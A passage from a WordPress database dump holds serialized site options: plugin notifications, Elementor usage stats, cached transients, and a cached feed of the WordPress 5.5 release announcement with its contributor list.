Pro\";}}s:5:\"start\";s:19:\"2020-10-29 10:26:52\";}i:1;a:6:{s:5:\"title\";s:69:\"Introducing WPForms Webhooks - Powerful Flexibility With Integrations\";s:7:\"content\";s:286:\"With the new WPForms Webhooks addon, you can automatically send data from forms to other tools and apps, without a 3rd-party connector. This power-user feature will help save time and money as you automate your forms. Upgrade to an Elite license now to start using this awesome feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:30;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:161:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Get WPForms Elite\";s:4:\"text\";s:17:\"Get WPForms Elite\";}s:3:\"alt\";a:2:{s:3:\"url\";s:176:\"https://wpforms.com/introducing-the-webhooks-addon-for-wpforms/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=Webhooks Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}}s:5:\"start\";s:19:\"2020-10-29 10:26:52\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(60314,'recovery_keys','a:0:{}','yes'),(60317,'elementor_controls_usage','a:1:{s:7:\"wp-post\";a:9:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:40;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:40;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:159;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:136;}}s:5:\"style\";a:1:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:159;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_button\";a:3:{s:4:\"text\";i:1;s:4:\"link\";i:1;s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:17:\"button_text_color\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:67;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:44;}s:14:\"section_layout\";a:1:{s:13:\"content_width\";i:1;}}s:5:\"style\";a:2:{s:21:\"eae_animated_gradient\";a:1:{s:19:\"gradient_color_list\";i:67;}s:14:\"section_border\";a:1:{s:13:\"border_border\";i:3;}}}}s:9:\"shortcode\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:3;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:3;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:119;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:8:{s:5:\"image\";i:118;s:7:\"caption\";i:8;s:14:\"caption_source\";i:8;s:10:\"image_size\";i:13;s:22:\"image_custom_dimension\";i:1;s:5:\"align\";i:1;s:7:\"link_to\";i:4;s:4:\"link\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:3:{s:19:\"image_border_border\";i:1;s:18:\"image_border_width\";i:3;s:18:\"image_border_color\";i:3;}}}}s:8:\"progress\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}s:11:\"star-rating\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}}}','no'),(60321,'_transient_health-check-site-status-result','{\"good\":\"7\",\"recommended\":\"7\",\"critical\":\"3\"}','yes'),(60422,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"15.2\";}','yes'),(60941,'updraft_combine_jobs_around','1593134682','yes'),(61470,'disallowed_keys','','no'),(61471,'comment_previously_approved','1','yes'),(61472,'auto_plugin_theme_update_emails','a:0:{}','no'),(61473,'finished_updating_comment_type','0','yes'),(61527,'_site_transient_timeout_browser_ef304b8034ec4ae3b449ff3aaae049f6','1598787029','no'),(61528,'_site_transient_browser_ef304b8034ec4ae3b449ff3aaae049f6','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"84.0.4147.135\";s:8:\"platform\";s:7:\"Windows\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(61563,'can_compress_scripts','1','no'),(61578,'_transient_timeout_wfcredentialstatus_3','1598361463','no'),(61579,'_transient_wfcredentialstatus_3','0503729720cdf68e5a42206b0cee5b4876d4eb70352469da8dcb8c5f12fd51103','no'),(61600,'_site_transient_timeout_community-events-fb18fac3d4ecfb4e42ee05b0e9f3b96d','1598401149','no'),(61601,'_site_transient_community-events-fb18fac3d4ecfb4e42ee05b0e9f3b96d','a:3:{s:9:\"sandboxed\";b:0;s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"69.165.31.0\";}s:6:\"events\";a:2:{i:0;a:8:{s:4:\"type\";s:6:\"meetup\";s:5:\"title\";s:45:\"Discussion Group: Introduction to Open-Source\";s:3:\"url\";s:68:\"https://www.meetup.com/learn-wordpress-discussions/events/272503835/\";s:6:\"meetup\";s:27:\"Learn WordPress Discussions\";s:10:\"meetup_url\";s:51:\"https://www.meetup.com/learn-wordpress-discussions/\";s:4:\"date\";s:19:\"2020-08-27 05:00:00\";s:8:\"end_date\";s:19:\"2020-08-27 06:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"US\";s:8:\"latitude\";d:37.7799987792970028976924368180334568023681640625;s:9:\"longitude\";d:-122.419998168950002082056016661226749420166015625;}}i:1;a:8:{s:4:\"type\";s:8:\"wordcamp\";s:5:\"title\";s:16:\"WordCamp Ogijima\";s:3:\"url\";s:34:\"https://2020.ogijima.wordcamp.org/\";s:6:\"meetup\";N;s:10:\"meetup_url\";N;s:4:\"date\";s:19:\"2020-09-06 01:00:00\";s:8:\"end_date\";s:19:\"2020-09-06 00:00:00\";s:8:\"location\";a:4:{s:8:\"location\";s:6:\"Online\";s:7:\"country\";s:2:\"JP\";s:8:\"latitude\";d:37.83273570000000063373590819537639617919921875;s:9:\"longitude\";d:139.11835730000001376538421027362346649169921875;}}}}','no'),(61602,'_transient_timeout_feed_9bbd59226dc36b9b26cd43f15694c5c3','1598401150','no');
INSERT INTO `ar_options` VALUES (61603,'_transient_feed_9bbd59226dc36b9b26cd43f15694c5c3','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"News –  – WordPress.org\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"https://wordpress.org/news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WordPress News\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 19:12:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"https://wordpress.org/?v=5.6-alpha-48858\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n\n\n\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"WordPress 5.5 “Eckstine”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"https://wordpress.org/news/2020/08/eckstine/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Aug 2020 19:03:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8799\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:354:\"Version 5.5 \"Eckstine\" of WordPress is available for download or update in your WordPress dashboard. With this release, your site gets new power in three major areas: \nspeed (lazy-loading images), search (sitemaps included by default), and security (auto-updates for plugins and themes), along with many new features and improvements to the block editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"enclosure\";a:3:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:48:\"https://s.w.org/images/core/5.5/auto-updates.mp4\";s:6:\"length\";s:6:\"238264\";s:4:\"type\";s:9:\"video/mp4\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:50:\"https://s.w.org/images/core/5.5/block-patterns.mp4\";s:6:\"length\";s:7:\"3518792\";s:4:\"type\";s:9:\"video/mp4\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"url\";s:56:\"https://s.w.org/images/core/5.5/inline-image-editing.mp4\";s:6:\"length\";s:7:\"3145140\";s:4:\"type\";s:9:\"video/mp4\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:68520:\"\n<p>Here it is! Named “Eckstine” in honor of Billy Eckstine, this latest and greatest version of WordPress is available for&nbsp;<a href=\"https://wordpress.org/download/\">download</a> or update in your dashboard.</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"632\" height=\"514\" src=\"https://i0.wp.com/wordpress.org/news/files/2020/08/Billy_duotone-1000px_quiche-sans-top.png?resize=632%2C514&#038;ssl=1\" alt=\"\" class=\"wp-image-8930\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2020/08/Billy_duotone-1000px_quiche-sans-top.png?w=1000&amp;ssl=1 1000w, https://i0.wp.com/wordpress.org/news/files/2020/08/Billy_duotone-1000px_quiche-sans-top.png?resize=300%2C244&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2020/08/Billy_duotone-1000px_quiche-sans-top.png?resize=768%2C625&amp;ssl=1 768w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></figure>\n\n\n\n<div class=\"wp-block-cover has-background-dim\" style=\"background-color:#f2edd4;min-height:300px\"><div class=\"wp-block-cover__inner-container\">\n<p class=\"has-text-align-center has-black-color has-text-color has-background has-large-font-size\" style=\"background-color:#f2edd4\">Welcome to WordPress 5.5.</p>\n\n\n\n<h3 class=\"has-text-align-center has-black-color has-text-color\">In WordPress 5.5, your site gets new power in three major areas: <br>speed, search, and security.</h3>\n</div></div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>Speed</h2>\n\n\n\n<p><strong>Posts and pages feel faster, thanks to lazy-loaded images.</strong></p>\n\n\n\n<p>Images give your story a lot of impact, but they can sometimes make your site seem slow.</p>\n\n\n\n<p>In WordPress 5.5, images wait to load until they’re just about to scroll into view. The technical term is ‘lazy loading.’</p>\n\n\n\n<p>On mobile, lazy loading can also keep browsers from loading files meant for other devices. That can save your readers money on data — and help preserve battery life.</p>\n\n\n\n<h2>Search</h2>\n\n\n\n<p><strong>Say hello to your new sitemap.</strong></p>\n\n\n\n<p>WordPress sites work well with search engines.</p>\n\n\n\n<p>Now, by default, WordPress 5.5 includes an XML sitemap that helps search engines discover your most important pages from the very minute you go live.</p>\n\n\n\n<p>So more people will find your site sooner, giving you more time to engage, retain and convert them to subscribers, customers or whatever fits your definition of success.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-background\" style=\"background-color:#ebcd3d\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>Security</h2>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"https://s.w.org/images/core/5.5/auto-updates.mp4\"></video><figcaption>Now you can choose to update plugins and themes automatically–or pick just a few–from the screens you’ve always used.</figcaption></figure>\n\n\n\n<p><strong>Auto-updates for Plugins and Themes</strong></p>\n\n\n\n<p>Now you can set plugins and themes to update automatically — or not! — in the WordPress admin. So you always know your site is running the latest code available.</p>\n\n\n\n<p>You can also turn auto-updates on or off for each plugin or theme you have installed — all on the same screens you’ve always used.</p>\n\n\n\n<p><strong>Update by uploading ZIP files</strong></p>\n\n\n\n<p>If updating plugins and themes manually is your thing, now that’s easier too — just upload a ZIP file.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-background\" style=\"background-color:#f2edd4\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>Highlights from the block editor</h2>\n\n\n\n<p>Once again, the latest WordPress release packs a long list of exciting new features for the block editor. For example:</p>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"https://s.w.org/images/core/5.5/block-patterns.mp4\"></video></figure>\n\n\n\n<div class=\"wp-block-columns\">\n<div class=\"wp-block-column\">\n<h3>Block patterns</h3>\n\n\n\n<p>New block patterns make it simple and fun to create complex, beautiful layouts, using combinations of text and media that you can mix and match to fit your story.</p>\n\n\n\n<p>You will also find block patterns in a wide variety of plugins and themes, with more added all the time. Pick any of them from a single place — just click and go!</p>\n</div>\n\n\n\n<div class=\"wp-block-column\">\n<h3>The new block directory</h3>\n\n\n\n<p>Now it’s easier than ever to find the block you need. The new block directory is built right into the block editor, so you can install new block types to your site without ever leaving the editor.</p>\n\n\n\n<h3>Inline image editing</h3>\n\n\n\n<p>Crop, rotate, and zoom your photos right from the image block. If you spend a lot of time on images, this could save you hours!</p>\n</div>\n</div>\n\n\n\n<figure class=\"wp-block-video\"><video controls src=\"https://s.w.org/images/core/5.5/inline-image-editing.mp4\"></video></figure>\n\n\n\n<h3>And so much more.</h3>\n\n\n\n<p>The highlights above are a tiny fraction of the new block editor features you’ve just installed. Open the block editor and enjoy!</p>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>Accessibility</h2>\n\n\n\n<p>Every release adds improvements to the accessible publishing experience, and that remains true for WordPress 5.5.</p>\n\n\n\n<p>Now you can copy links in media screens and modal dialogs with a button, instead of trying to highlight a line of text.</p>\n\n\n\n<p>You can also move meta boxes with the keyboard, and edit images in WordPress with your assistive device, as it can read you the instructions in the image editor.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-black-color has-text-color has-background\" style=\"background-color:#ebcd3d\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>For developers</h2>\n\n\n\n<p>5.5 also brings a big box of changes just for developers.</p>\n\n\n\n<div class=\"wp-block-columns\">\n<div class=\"wp-block-column\">\n<h3>Server-side registered blocks in the REST API</h3>\n\n\n\n<p>The addition of block types endpoints means that JavaScript apps (like the block editor) can retrieve definitions for any blocks registered on the server.</p>\n\n\n\n<h3>Defining environments</h3>\n\n\n\n<p>WordPress now has a standardized way to define a site’s environment type (staging, production, etc). Retrieve that type with&nbsp;<code>wp_get_environment_type()</code>&nbsp;and execute only the appropriate code.</p>\n\n\n\n<h3>Dashicons</h3>\n\n\n\n<p>The Dashicons library has received its final update in 5.5. It adds 39 block editor icons along with 26 others.</p>\n\n\n\n<h3>Passing data to template files</h3>\n\n\n\n<p>The template loading functions (<code>get_header()</code>,&nbsp;<code>get_template_part()</code>, etc.) have a new&nbsp;<code>$args</code>&nbsp;argument. So now you can pass an entire array’s worth of data to those templates.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\">\n<h3>More changes for developers</h3>\n\n\n\n<ul><li>The PHPMailer library just got a major update, going from version 5.2.27 to 6.1.6.</li><li>Now get more fine-grained control of&nbsp;<code>redirect_guess_404_permalink()</code>.</li><li>Sites that use PHP’s OPcache will see more reliable cache invalidation, thanks to the new&nbsp;<code>wp_opcache_invalidate()</code>&nbsp;function during updates (including to plugins and themes).</li><li>Custom post types associated with the category taxonomy can now opt-in to supporting the default term.</li><li>Default terms can now be specified for custom taxonomies in&nbsp;<code>register_taxonomy()</code>.</li><li>The REST API now officially supports specifying default metadata values through&nbsp;<code>register_meta()</code>.</li><li>You will find updated versions of these bundled libraries: SimplePie, Twemoji, Masonry, imagesLoaded, getID3, Moment.js, and clipboard.js.</li></ul>\n</div>\n</div>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\n\n\n<div class=\"wp-block-columns has-white-background-color has-background\">\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:96%\">\n<h2>The Squad</h2>\n\n\n\n<p>Leading this release were&nbsp;<a href=\"http://ma.tt/\">Matt Mullenweg</a>,&nbsp;<a href=\"https://profiles.wordpress.org/whyisjake\">Jake Spurlock,</a> and&nbsp;<a href=\"https://dream-encode.com/blog/\">David Baumwald</a>. Supporting them was this highly enthusiastic release squad:</p>\n\n\n\n<ul><li><strong>Editor Tech</strong>: Ella Van Durpe (<a href=\'https://profiles.wordpress.org/ellatrix/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>ellatrix</a>)</li><li><strong>Editor Design</strong>: Michael Arestad (<a href=\'https://profiles.wordpress.org/michael-arestad/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>michael-arestad</a>)</li><li><strong>Core Tech</strong>: Sergey Biryukov (<a href=\'https://profiles.wordpress.org/sergeybiryukov/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>sergeybiryukov</a>)</li><li><strong>Media Tech: </strong>Andrew Ozz (<a href=\'https://profiles.wordpress.org/azaozz/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>azaozz</a>)</li><li><strong>Accessibility Tech</strong>: JB Audras (<a href=\'https://profiles.wordpress.org/audrasjb/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>audrasjb</a>)</li><li><strong>Docs Coordinator</strong>:&nbsp;Justin Ahinon (<a href=\'https://profiles.wordpress.org/justinahinon/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>justinahinon</a>)</li><li><strong>Marketing/Comms Coordinator</strong>: Mary Baum (<a href=\'https://profiles.wordpress.org/marybaum/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>marybaum</a>)</li></ul>\n\n\n\n<p>Joining the squad throughout the release cycle were <strong>805 generous volunteer contributors</strong> who collectively worked on over <strong><a href=\"https://core.trac.wordpress.org/milestone/5.5\">523</a> tickets on Trac</strong> and <strong>over 1660 pull requests on GitHub</strong>.</p>\n\n\n\n<p>Put on a Billy Eckstine playlist, click that update button (or&nbsp;<a href=\"https://wordpress.org/download/\">download it directly</a>), and check the profiles of the fine folks that helped:</p>\n\n\n<a href=\"https://profiles.wordpress.org/a2hosting/\">A2 Hosting</a>, <a href=\"https://profiles.wordpress.org/a4jpcom/\">a4jp . com</a>, <a href=\"https://profiles.wordpress.org/a6software/\">a6software</a>, <a href=\"https://profiles.wordpress.org/aaroncampbell/\">Aaron D. Campbell</a>, <a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/abderrahman/\">abderrahman</a>, <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a>, <a href=\"https://profiles.wordpress.org/ibachal/\">Achal Jain</a>, <a href=\"https://profiles.wordpress.org/achbed/\">achbed</a>, <a href=\"https://profiles.wordpress.org/achyuthajoy/\">Achyuth Ajoy</a>, <a href=\"https://profiles.wordpress.org/acosmin/\">acosmin</a>, <a href=\"https://profiles.wordpress.org/acsnaterse/\">acsnaterse</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/addiestavlo/\">Addie</a>, <a href=\"https://profiles.wordpress.org/addyosmani/\">addyosmani</a>, <a href=\"https://profiles.wordpress.org/adnanlimdi/\">adnan.limdi</a>, <a href=\"https://profiles.wordpress.org/adrian/\">adrian</a>, <a href=\"https://profiles.wordpress.org/airamerica/\">airamerica</a>, <a href=\"https://profiles.wordpress.org/ajayghaghretiya1/\">Ajay Ghaghretiya</a>, <a href=\"https://profiles.wordpress.org/ajitbohra/\">Ajit Bohra</a>, <a href=\"https://profiles.wordpress.org/akbarhusen/\">akbarhusen</a>, <a href=\"https://profiles.wordpress.org/akbarhusen429/\">akbarhusen429</a>, <a href=\"https://profiles.wordpress.org/akhileshsabharwal/\">Akhilesh Sabharwal</a>, <a href=\"https://profiles.wordpress.org/atachibana/\">Akira Tachibana</a>, <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/aljullu/\">Albert Juh&#233; Lluveras</a>, <a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/akirk/\">Alex Kirk</a>, <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a>, <a href=\"https://profiles.wordpress.org/tellyworth/\">Alex Shiels</a>, <a href=\"https://profiles.wordpress.org/alishanvr/\">Ali Shan</a>, <a href=\"https://profiles.wordpress.org/ali11007/\">ali11007</a>, <a href=\"https://profiles.wordpress.org/allendav/\">Allen Snook</a>, <a href=\"https://profiles.wordpress.org/amaschas/\">amaschas</a>, <a href=\"https://profiles.wordpress.org/wpamitkumar/\">Amit Dudhat</a>, <a href=\"https://profiles.wordpress.org/anbumz/\">anbumz</a>, <a href=\"https://profiles.wordpress.org/andfinally/\">andfinally</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andreamiddleton/\">Andrea Middleton</a>, <a href=\"https://profiles.wordpress.org/dontdream/\">Andrea Tarantini</a>, <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>, <a href=\"https://profiles.wordpress.org/aduth/\">Andrew Duthie</a>, <a href=\"https://profiles.wordpress.org/nacin/\">Andrew Nacin</a>, <a href=\"https://profiles.wordpress.org/anevins/\">Andrew Nevins</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/rarst/\">Andrey \"Rarst\" Savchenko</a>, <a href=\"https://profiles.wordpress.org/nosolosw/\">Andrés Maneiro</a>, <a href=\"https://profiles.wordpress.org/afragen/\">Andy Fragen</a>, <a href=\"https://profiles.wordpress.org/andizer/\">Andy Meerwaldt</a>, <a href=\"https://profiles.wordpress.org/apeatling/\">Andy Peatling</a>, <a href=\"https://profiles.wordpress.org/angelasjin/\">Angela Jin</a>, <a href=\"https://profiles.wordpress.org/la-geek/\">Angelika Reisiger</a>, <a href=\"https://profiles.wordpress.org/rilwis/\">Anh Tran</a>, <a href=\"https://profiles.wordpress.org/wpgurudev/\">Ankit Gade</a>, <a href=\"https://profiles.wordpress.org/ankit-k-gupta/\">Ankit K Gupta</a>, <a href=\"https://profiles.wordpress.org/ankitmaru/\">Ankit Panchal</a>, <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>, <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/ahortin/\">Anthony Hortin</a>, <a href=\"https://profiles.wordpress.org/atimmer/\">Anton Timmermans</a>, <a href=\"https://profiles.wordpress.org/antonisme/\">Antonis Lilis</a>, <a href=\"https://profiles.wordpress.org/apedog/\">apedog</a>, <a href=\"https://profiles.wordpress.org/archon810/\">archon810</a>, <a href=\"https://profiles.wordpress.org/argentite/\">argentite</a>, <a href=\"https://profiles.wordpress.org/arpitgshah/\">Arpit G Shah</a>, <a href=\"https://profiles.wordpress.org/passoniate/\">Arslan Ahmed</a>, <a href=\"https://profiles.wordpress.org/asalce/\">asalce</a>, <a href=\"https://profiles.wordpress.org/ashiagr/\">ashiagr</a>, <a href=\"https://profiles.wordpress.org/ashour/\">ashour</a>, <a href=\"https://profiles.wordpress.org/tacitonic/\">Atharva Dhekne</a>, <a href=\"https://profiles.wordpress.org/ajoah/\">Aur&#233;lien Joahny</a>, <a href=\"https://profiles.wordpress.org/aussi/\">aussi</a>, <a href=\"https://profiles.wordpress.org/automaton/\">automaton</a>, <a href=\"https://profiles.wordpress.org/ayeshrajans/\">Ayesh Karunaratne</a>, <a href=\"https://profiles.wordpress.org/backups/\">BackuPs</a>, <a href=\"https://profiles.wordpress.org/barry/\">Barry</a>, <a href=\"https://profiles.wordpress.org/barryceelen/\">Barry Ceelen</a>, <a href=\"https://profiles.wordpress.org/bartczyz/\">Bart Czyz</a>, <a 